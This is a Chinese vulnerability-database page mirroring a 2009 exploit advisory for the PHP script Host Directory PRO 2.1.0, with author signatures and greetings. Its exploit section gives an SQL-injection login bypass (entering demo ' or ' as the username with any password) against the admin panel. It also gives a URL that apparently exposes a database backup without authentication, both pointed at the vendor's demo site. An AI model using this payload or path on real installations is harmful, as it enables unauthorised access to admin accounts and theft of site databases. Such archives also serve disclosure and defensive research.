Host Directory PRO 2.1.0 - Remote Database Backup

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057874 漏洞类型
发布时间 2009-06-04 更新时间 2009-06-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8877
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[~] Host Directory Pro Bypass & Backup DB Disc. Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 28/03/09
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: New Target Buffer Overflow : ) there is a little time xD
[~]
[~] N0T: Unutulduk mu ?
[~] -----------------------------------------------------------

script:

http://www.phphostdirectoryscript.com/

Bypass for demo:

username: demo ' or '

pass: ZoRLu or dont write anything

http://demo-host-directory-pro.phphostdirectoryscript.com/

Backup DB Disc. for demo:

http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db

[~]----------------------------------------------------------------------
[~] Greetz tO: Cyber-Zone & Dr.Ly0N & w0cker
[~]
[~] yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-04]